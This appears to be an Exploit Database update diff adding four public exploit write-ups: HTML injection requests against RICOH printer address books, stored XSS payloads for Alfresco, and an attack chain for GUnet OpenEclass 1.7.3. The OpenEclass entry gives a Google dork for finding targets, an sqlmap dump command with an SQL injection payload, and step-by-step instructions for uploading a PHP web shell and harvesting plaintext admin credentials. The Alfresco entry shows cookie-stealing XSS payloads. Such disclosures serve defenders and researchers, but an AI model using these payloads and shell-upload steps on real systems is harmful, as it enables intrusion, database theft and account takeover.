DB: 2020-03-04

4 changes to exploits/shellcodes

RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
Alfresco 5.2.4 - Persistent Cross-Site Scripting
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection

exploits/hardware/webapps/48161.txt

@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
+# Discovery by: Paulina Girón
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
+# Product Version: RICOH Aficio SP 5200S Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 447
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:15:59 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:15:59 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 611
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:17:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:17:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close

exploits/hardware/webapps/48164.txt

@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
+# Discovery by: Olga Villagran
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
+# Product Version: RICOH Aficio SP 5210SF Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 402
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:22:44 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:22:44 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+
+POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 607
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:23:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:23:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close

exploits/php/webapps/48162.txt

@@ -0,0 +1,79 @@
+# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
+# Date: 2020-03-02
+# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://www.alfresco.com/
+# Software Link: https://www.alfresco.com/ecm-software
+# Version: Alfresco before 5.2.4
+# Tested on: 5.2.4
+# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
+# Security advisory: https://gitlab.com/snippets/1937042
+
+
+### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
+
+Each file has a set of properties than can be edited by any authenticated user
+that have write access on the project or the file.
+
+The **URL** property of the file provided by the user is injected in the `href`
+attribute of the HTML link without a proper escaping.
+
+- Where? In URL property
+- Payload: `" onmouseover="alert(document.cookie)"`
+- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
+  ```html
+  <a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
+  ```
+- Privileges: It requires write privileges to store it, any user with read access can see it.
+- Steps to reproduce:
+  1. Go to _Document Library_
+  2. Upload a file or click _Edit properties_ on an existing file
+  3. Enter the payload in the URL property
+  4. Click on the file title to go on the detailed page of the file
+  5. Hover the displayed link to trigger the XSS
+
+### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
+
+There is no file restriction for photo uploading in the user profile page.
+Then the profile picture can be seen in the browser.
+
+- Where? In user profile photo
+- Payload:
+  ```xml
+  <?xml version="1.0" standalone="no"?>
+  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+    <polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
+    <script type="text/javascript">
+        alert('XSS - Orange Cyberdefense');
+    </script>
+  </svg>
+  ```
+- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
+- Privileges: Any authenticated user can store it or trigger it.
+- Steps to reproduce:
+  1. Go to your user profile page (`/share/page/user/<username>/profile`)
+  2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
+  3. Use the document browser or any dashboard to find the uploaded file
+  4. Click on the title to go to the detailed page of the file
+  5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
+
+### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
+
+This is the generic version of the previous XSS. Uploading dangerous file types
+is allowed and then they can be viewed to triggered the XSS. The difference
+between the two is that this one requires right access on a project to upload
+documents so the XSS is not exploitable with a read only account but the
+previous one can be exploited by any user as any user is allowed to have a
+profile photo.
+
+- Where? Uploading a document anywhere
+- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
+- Details: The XSS is triggerred only with the _View in browser_ feature.
+- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
+- Steps to reproduce:
+  1. Go to a project dashboard
+  2. IClick _Upload_ and upload a dangerous file
+  3. Use the document browser or any dashboard to find the uploaded file
+  4. Click on the title to go to the detailed page of the file
+  5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)

exploits/php/webapps/48163.txt

@@ -0,0 +1,116 @@
+# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
+# Google Dork: intext:"© GUnet 2003-2007" 	
+# Date: 2020-03-02
+# Exploit Author: emaragkos
+# Vendor Homepage: https://www.openeclass.org/
+# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+# Version: 1.7.3 (2007)
+# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
+# CVE : -
+
+Older versions are also vulnerable.
+
+Source code:
+http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
+http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+
+Setup instructions:
+http://download.openeclass.org/files/docs/1.7/Install.pdf
+
+Changelog:
+https://download.openeclass.org/files/docs/1.7/CHANGES.txt
+
+Manual:
+https://download.openeclass.org/files/docs/1.7/eClass.pdf
+
+############################################################################
+
+Unauthenticated Information Disclosure
+
+System info
+127.0.0.1/modules/admin/sysinfo 
+(powered by phpSysInfo 2.0 that is also vulnerable)
+
+Web-App version info
+127.0.0.1/README.txt
+127.0.0.1/info/about.php
+127.0.0.1/upgrade/CHANGES.txt
+
+############################################################################
+  
+(Authenticated - Requires student account) - Error-Based SQLi
+
+https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
+
+sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
+
+---
+Parameter: month (GET)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
+---
+ 
+Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
+If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
+If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
+It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
+https://www.exploit-db.com/exploits/48106
+
+############################################################################
+
+(Authenticated - Requires student account) - PHP upload file extension bypass
+If you have a student account you can bypass file extension restrictions and upload a PHP shell.
+Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
+Start looking for a class that you can submit an exercise as a student.
+Register in that class and navigate to submit you exercise.
+If you try to upload a .php file it will be renamed to .phps to prevent execution.
+You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
+Once you have uploaded it, open your course directory and then add "work" directory at the end
+Course link example: https://127.0.0.1/courses/CS101/
+Course link becomes: https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view the directories.
+Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
+Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
+
+The same method works with "groups" if you cant find a class that supports submitting an exercise.
+https://127.0.0.1/modules/group/group.php
+
+############################################################################
+
+(Authenticated - Requires student account) - View assessments of other students
+If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
+Find the course link you are interested in.
+https://127.0.0.1/courses/CS101
+Add "work" directory at the end
+https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
+
+############################################################################
+
+(Authenticated - Requires admin account) - Upload PHP files 
+
+You have to login to the platform as an administrator or user with admin rights.
+You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
+following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
+Once you have logged in as admin:
+1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
+2) Upload your .php shell compressed in a .zip file
+3) Ignore the error message
+4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php 
+
+############################################################################
+
+(Authenticated - Requires admin account) - phpMyAdmin Remote Access 
+
+127.0.0.1/modules/admin/mysql
+phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
+Once you have uploaded your shell can view the config.php file that contains the mysql password
+127.0.0.1/config/config.php 
+
+############################################################################
+
+(Authenticated - Requires admin account) - Plaintext password storage
+
+When logged in as admin you can view all registered users credentials as plaintext.
+127.0.0.1/modules/admin/listusers.php

files_exploits.csv

@@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
 48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
 48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
 48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
+48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
+48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
+48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
+48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,